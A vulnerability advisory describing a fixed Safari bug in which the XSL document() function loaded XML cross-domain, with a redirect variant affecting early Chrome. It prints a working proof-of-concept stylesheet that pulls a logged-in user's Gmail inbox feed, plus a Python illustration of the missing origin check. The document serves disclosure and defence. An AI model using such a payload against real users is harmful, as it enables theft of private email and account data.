CESA-2009-008 - rev 1
[See all my vulnerabilities at
http://scary.beasts.org/security]
[Blog if you want to subscribe to new findings is at
http://scarybeastsecurity.blogspot.com/]
Apple Safari cross-domain XML theft
Programs affected: Safari prior to version 4. In addition, the "302
redirect trick" variant affected a pre-production version of Chrome.
Severity: Websites can steal any XML formatted data cross-domain
Vendor URL (copy): APPLE-SA-2009-06-08-1
CVE: CVE-2009-1713, CVE-2009-1700
Initial report: Jun 2008
This bug represents a failure to check for cross-domain access in a relatively
obscure feature that permits cross-domain access. It is one of the bugs I
demoed but did not disclose at PacSec and HiTB Dubai.
The particular feature involved in this case is the XSL document()
function, which can load XML from a URL. Failure to check for cross-domain
access here leads to XML theft from arbitrary web sites. XML theft is
unpleasant because very sensitive information can be rendered in feeds,
XML-formatted AJAX-y responses and XHTML versions of web apps.
Here's sample code for an evil XSL which abuses this function to steal
inbox details from a logged-in Gmail session:
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:str="http://exslt.org/strings" extension-element-prefixes="str">
<xsl:template match="*">
<html>
<body>
Below, you should see e-mail stolen cross-domain!
<p/>
<xsl:value-of select="document('https://mail.google.com/mail/feed/atom')"/>
<script>
alert(document.body.innerHTML)
</script>
</body>
</html>
</xsl:template>
</xsl:stylesheet>
A variant of this attack, involving using the 302 redirect trick to fool the
original fix's idea of the XML's domain, also affected a pre-production version
of Chrome (long since fixed, and fixed prior to v1.0).
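The two paragraphs above describe the same missing check from both sides: the
XSL document() function must only hand back XML that is same-origin with the
document whose stylesheet invoked it, and (the redirect variant) that comparison
has to be made against every URL in the redirect chain, not just the one named
in the document() call, otherwise a same-origin URL that 302s to a
cross-origin feed passes. The following is an added illustration of that check,
written for this page; it is not Safari's, WebKit's or Chrome's code. The
origin() and document_load_allowed() helpers and the attacker.example host are
assumptions made for the example, and the redirect chain is constructed inline.

```python
from urllib.parse import urlsplit

# Default ports per scheme, so that http://a/ and http://a:80/ compare equal.
DEFAULT_PORTS = {"http": 80, "https": 443}


def origin(url):
    """Return the (scheme, host, port) origin of a URL, or None if it has none."""
    parts = urlsplit(url)
    if not parts.scheme or not parts.hostname:
        return None
    try:
        port = parts.port
    except ValueError:  # non-numeric port: treat as no usable origin
        return None
    if port is None:
        port = DEFAULT_PORTS.get(parts.scheme.lower())
    return (parts.scheme.lower(), parts.hostname.lower(), port)


def document_load_allowed(stylesheet_url, redirect_chain):
    """Decide whether an XSL document() call may return the fetched XML.

    stylesheet_url: URL of the document whose stylesheet called document().
    redirect_chain: the URL originally requested, followed by every Location the
        fetch was redirected to; the last entry is the URL whose body would be
        returned. Every hop must be same-origin with the stylesheet document.
        Checking only redirect_chain[0] is exactly the gap the 302 redirect
        variant in the advisory exploits (hypothetical helper, not browser code).
    """
    base = origin(stylesheet_url)
    if base is None or not redirect_chain:
        return False
    return all(origin(hop) == base for hop in redirect_chain)


if __name__ == "__main__":
    # Constructed scenario: attacker.example is a placeholder host.
    evil_xsl_page = "http://attacker.example/evil.xml"

    # Direct cross-origin load, as in the stylesheet shown in the advisory.
    print(document_load_allowed(evil_xsl_page,
                                ["https://mail.google.com/mail/feed/atom"]))

    # Redirect variant: a same-origin URL that 302s to the cross-origin feed.
    print(document_load_allowed(evil_xsl_page,
                                ["http://attacker.example/redir",
                                 "https://mail.google.com/mail/feed/atom"]))

    # Legitimate same-origin use of document() is still allowed.
    print(document_load_allowed(evil_xsl_page,
                                ["http://attacker.example/data.xml"]))
```

The point of passing the whole chain rather than the final URL alone is that a
chain whose intermediate hop is cross-origin has already leaked the fact that
the intermediate resource exists and where it redirects to; requiring every hop
to match makes the decision independent of where in the chain the origin
changes.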
Demo
Click here whilst logged into Gmail using Safari 3.
Credits
- Google - found on Google's time. Be aware that nothing on my personal
pages or blog represents Google... obviously.
Chris Evans
scarybeasts@gmail.com